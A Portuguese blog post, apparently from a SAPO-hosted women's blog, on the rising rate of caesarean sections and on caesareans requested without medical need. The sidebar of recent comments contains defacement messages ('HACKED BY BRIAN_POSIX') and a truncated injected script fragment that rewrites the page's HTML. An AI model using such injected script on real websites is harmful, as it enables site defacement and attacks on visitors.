Conversa Entre Amigas @ 18:34

Qua, 18/04/12

Nos últimos anos assistiu-se a um aumento notório do número de cesarianas e, aparentemente esse aumento é similar nos diferentes países desenvolvidos. A CST deixou de ser um procedimento que só se realizava em circunstâncias extremas para se tornar na cirurgia mais realizada nas mulheres. Continua no entanto a ser considerada uma cirurgia maior e portanto com riscos e complicações associadas.

Este aumento deve-se por um lado a uma melhoria das condições anestésicas, de antibioterapia, de prevenção do tromboembolismo mas também a um maior número de induções de trabalho de parto, maior receio de litígios profissionais e de um grande número de cesarianas (CST) a pedido.  

O aumento das expectativas em relação à maternidade e a criação de alguns mitos (que o parto vaginal é doloroso e traz consequencias para o pavimento pélvico como a incontinência urinária, por oposição a CST é feita com anestesia e não tem consequencias no pavimento pélvico e existe além disso a ideia generalizada de que a cst eletiva é segura) que muitas vezes confundem a opinião pública, levou ao aparecimento de uma entidade nova – a CST a pedido.




Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO